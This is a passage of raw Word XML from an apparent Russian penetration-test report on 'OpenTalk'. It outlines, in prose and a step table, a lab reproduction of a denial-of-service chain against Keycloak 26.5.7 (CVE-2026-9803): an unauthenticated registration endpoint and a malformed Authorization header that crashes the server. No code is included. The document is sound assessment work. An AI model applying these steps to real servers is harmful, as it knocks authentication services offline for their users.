          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> теоретически присутствуют, однако для их практической эксплуатации в контексте ПО </w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">» </w:t>
      </w:r>
      <w:r w:rsidRPr="00604BD8">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>не выполня</w:t>
      </w:r>
      <w:r w:rsidR="00087F8B">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>ю</w:t>
      </w:r>
      <w:r w:rsidRPr="00604BD8">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>тся ряд необходимых условий</w:t>
      </w:r>
      <w:r w:rsidR="00087F8B">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E70051" w14:textId="77777777" w:rsidR="00557FDB" w:rsidRDefault="00557FDB" w:rsidP="00557FDB">
      <w:pPr>
        <w:pStyle w:val="1f6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C64D1D2" wp14:editId="6B9F9102">
            <wp:extent cx="5452900" cy="5251632"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="4453418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826" cy="526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32D1" w14:textId="27072788" w:rsidR="006A73C5" w:rsidRDefault="00557FDB" w:rsidP="00557FDB">
      <w:pPr>
        <w:pStyle w:val="18"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Ref234285639"/>
      <w:r>
        <w:t>Проверка</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>наличия уязвимости</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="0259D1CA" w14:textId="00D7B456" w:rsidR="001E0634" w:rsidRDefault="001E0634" w:rsidP="001E0634">
      <w:pPr>
        <w:pStyle w:val="1f6"/>
      </w:pPr>
      <w:r w:rsidRPr="001E0634">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="123C8115" wp14:editId="232FEE5A">
            <wp:extent cx="4218305" cy="1340485"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="121868999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05E94" w14:textId="5A84D37B" w:rsidR="001E0634" w:rsidRDefault="001E0634" w:rsidP="001E0634">
      <w:pPr>
        <w:pStyle w:val="18"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Ref234286213"/>
      <w:r>
        <w:t xml:space="preserve">Эксплойт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00087F8B">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>CVE-2026-9704</w:t>
      </w:r>
      <w:r w:rsidRPr="00087F8B">
        <w:t>»</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="3D26BBA8" w14:textId="77777777" w:rsidR="001E0634" w:rsidRPr="001E0634" w:rsidRDefault="001E0634" w:rsidP="001E0634">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27C98AE0" w14:textId="59C5CD40" w:rsidR="00087F8B" w:rsidRDefault="00087F8B" w:rsidP="00087F8B">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r>
        <w:t>Воспроизведение цепочки 2 в ПО «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47711D5B" w14:textId="388D6B22" w:rsidR="00087F8B" w:rsidRDefault="00087F8B" w:rsidP="00087F8B">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Проверка цепочки</w:t>
      </w:r>
      <w:r w:rsidR="00DE4784">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">проводится в изолированной сети </w:t>
      </w:r>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>WSL</w:t>
      </w:r>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>», цепочка</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> завязана на микросервисе </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Keycloak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>26.5.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> как единственного внешне достижимого компонента платформы, обрабатывающего OIDC-токены.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для достижения необходимых целей буд</w:t>
      </w:r>
      <w:r w:rsidR="00DE4784">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">т использоваться </w:t>
      </w:r>
      <w:r>
        <w:t>«</w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidR="00DE4784" w:rsidRPr="00DE4784">
          <w:rPr>
            <w:rStyle w:val="af1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>CVE</w:t>
        </w:r>
        <w:r w:rsidR="00DE4784" w:rsidRPr="00DE4784">
          <w:rPr>
            <w:rStyle w:val="af1"/>
          </w:rPr>
          <w:t>-2026-9803</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00DE4784" w:rsidRPr="00DE4784">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ниже приведена реализаци</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> цепочки на демонстрационном стенде</w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref234413967 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>таблица 2.7</w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606E382C" w14:textId="45E211B7" w:rsidR="00D80616" w:rsidRDefault="00D80616" w:rsidP="00087F8B">
      <w:pPr>
        <w:pStyle w:val="19"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Ref234413967"/>
      <w:r>
        <w:t>Этапы воспроизведения уязвимости</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/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572"/>
        <w:gridCol w:w="2975"/>
        <w:gridCol w:w="5804"/>
      </w:tblGrid>
      <w:tr w:rsidR="00087F8B" w:rsidRPr="00087F8B" w14:paraId="4CF72382" w14:textId="77777777" w:rsidTr="00004B23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43D33C2A" w14:textId="77777777" w:rsidR="00087F8B" w:rsidRPr="00C82B97" w:rsidRDefault="00087F8B" w:rsidP="00004B23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</w:rPr>
              <w:t>№</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19B7DE98" w14:textId="77777777" w:rsidR="00087F8B" w:rsidRPr="00C82B97" w:rsidRDefault="00087F8B" w:rsidP="00004B23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  <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Этап</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DE31DB3" w14:textId="77777777" w:rsidR="00087F8B" w:rsidRPr="00C82B97" w:rsidRDefault="00087F8B" w:rsidP="00004B23">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C82B97">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Комментарий</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00087F8B" w:rsidRPr="00087F8B" w14:paraId="0FA57D8A" w14:textId="77777777" w:rsidTr="00004B23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="401A1701" w14:textId="77777777" w:rsidR="00087F8B" w:rsidRPr="00087F8B" w:rsidRDefault="00087F8B" w:rsidP="00004B23">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00087F8B">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43F166F7" w14:textId="19AD0BE9" w:rsidR="00087F8B" w:rsidRPr="00087F8B" w:rsidRDefault="001C5926" w:rsidP="00004B23">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C5926">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Проверка сервера на наличие «CVE-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001C5926">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>2026-9803</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001C5926">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F07F743" w14:textId="4740FDBA" w:rsidR="00087F8B" w:rsidRPr="00087F8B" w:rsidRDefault="001C5926" w:rsidP="00004B23">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C5926">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">Проверяется версия </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00763E44" w:rsidRPr="001C5926">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>и</w:t>
            </w:r>
            <w:r w:rsidRPr="001C5926">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> доступность </w:t>
            </w:r>
            <w:r w:rsidR="002C4CF3">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>конечной точки</w:t>
            </w:r>
            <w:r w:rsidRPr="001C5926">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> регистрации клиентов без аутентификации</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00087F8B" w:rsidRPr="00087F8B" w14:paraId="363D0893" w14:textId="77777777" w:rsidTr="00004B23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ACDD373" w14:textId="77777777" w:rsidR="00087F8B" w:rsidRPr="00087F8B" w:rsidRDefault="00087F8B" w:rsidP="00004B23">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00087F8B">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2535C516" w14:textId="792F53D1" w:rsidR="00087F8B" w:rsidRPr="00087F8B" w:rsidRDefault="001C5926" w:rsidP="00004B23">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C5926">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Формирование запроса</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AD69C76" w14:textId="10AB7D1F" w:rsidR="00087F8B" w:rsidRPr="00C54DEE" w:rsidRDefault="001C5926" w:rsidP="00004B23">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Ф</w:t>
            </w:r>
            <w:r w:rsidRPr="001C5926">
              <w:t>ормируется запрос к уязвимо</w:t>
            </w:r>
            <w:r w:rsidR="00557FDB">
              <w:t>й конечной точке</w:t>
            </w:r>
            <w:r w:rsidRPr="001C5926">
              <w:t xml:space="preserve"> с намеренно искажённым заголовком </w:t>
            </w:r>
            <w:r w:rsidR="00557FDB" w:rsidRPr="001C5926">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C5926">
              <w:t>Authorization</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00557FDB" w:rsidRPr="001C5926">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidRPr="001C5926">
              <w:t>, вызывающим необработанное исключение на стороне сервера</w:t>
            </w:r>
            <w:r w:rsidR="00557FDB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D80616">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00C54DEE">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C54DEE">
              <w:instrText xml:space="preserve"> REF _Ref234290812 \r \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C54DEE" w:rsidRPr="00C54DEE">
              <w:instrText>\</w:instrText>
            </w:r>
            <w:r w:rsidR="00C54DEE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:instrText>t</w:instrText>
            </w:r>
            <w:r w:rsidR="00C54DEE">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D80616">
              <w:t>листинг</w:t>
            </w:r>
            <w:r w:rsidR="00C54DEE">
              <w:t xml:space="preserve"> 2.3</w:t>
            </w:r>
            <w:r w:rsidR="00C54DEE">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00D80616">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00087F8B" w:rsidRPr="00087F8B" w14:paraId="3191A521" w14:textId="77777777" w:rsidTr="00004B23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E7EC199" w14:textId="75AB7B3B" w:rsidR="00087F8B" w:rsidRPr="00087F8B" w:rsidRDefault="001C5926" w:rsidP="00004B23">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FD5EE63" w14:textId="07BCEF45" w:rsidR="00087F8B" w:rsidRPr="00087F8B" w:rsidRDefault="001C5926" w:rsidP="00004B23">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C5926">
              <w:t>Отправка запроса</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D2723B6" w14:textId="470C595F" w:rsidR="00087F8B" w:rsidRPr="00087F8B" w:rsidRDefault="001C5926" w:rsidP="00004B23">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001C5926">
              <w:t xml:space="preserve">Запрос отправляется без предварительной </w:t>
            </w:r>
            <w:r w:rsidR="00B63AEE">
              <w:t xml:space="preserve">проверки, далее сервер присылает ответ 500, </w:t>
            </w:r>
            <w:r w:rsidRPr="001C5926">
              <w:t>что делает вектор доступны</w:t>
            </w:r>
            <w:r w:rsidR="00B63AEE">
              <w:t>м для атаки</w:t>
            </w:r>
            <w:r w:rsidR="00557FDB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D80616">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="002C4CF3">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="002C4CF3">
              <w:instrText xml:space="preserve"> REF _Ref234286605 \r \h \</w:instrText>
            </w:r>
            <w:r w:rsidR="002C4CF3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:instrText>t</w:instrText>
            </w:r>
            <w:r w:rsidR="002C4CF3">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="002C4CF3">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D80616">
              <w:t>рисунок</w:t>
            </w:r>
            <w:r w:rsidR="002C4CF3">
              <w:t xml:space="preserve"> 2.4</w:t>
            </w:r>
            <w:r w:rsidR="002C4CF3">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00D80616">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00087F8B" w:rsidRPr="00087F8B" w14:paraId="44FDBCF3" w14:textId="77777777" w:rsidTr="00004B23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="191E150A" w14:textId="77777777" w:rsidR="00087F8B" w:rsidRPr="00087F8B" w:rsidRDefault="00087F8B" w:rsidP="00004B23">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00087F8B">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3219EF75" w14:textId="338AD5AD" w:rsidR="00087F8B" w:rsidRPr="00087F8B" w:rsidRDefault="00B63AEE" w:rsidP="00004B23">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>А</w:t>
            </w:r>
            <w:r w:rsidRPr="00B63AEE">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>варийное завершение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="280438A4" w14:textId="6433713D" w:rsidR="00087F8B" w:rsidRPr="00087F8B" w:rsidRDefault="00B63AEE" w:rsidP="00004B23">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B63AEE">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">Сервер некорректно обрабатывает исключение, что приводит к деградации сервиса или падению процесса </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="001F04CB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00087F8B" w:rsidRPr="00087F8B" w14:paraId="4667C590" w14:textId="77777777" w:rsidTr="00004B23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DDCC4A2" w14:textId="59C7978B" w:rsidR="00087F8B" w:rsidRPr="00087F8B" w:rsidRDefault="00B63AEE" w:rsidP="00004B23">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19706E3E" w14:textId="77777777" w:rsidR="00087F8B" w:rsidRPr="00087F8B" w:rsidRDefault="00087F8B" w:rsidP="00004B23">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
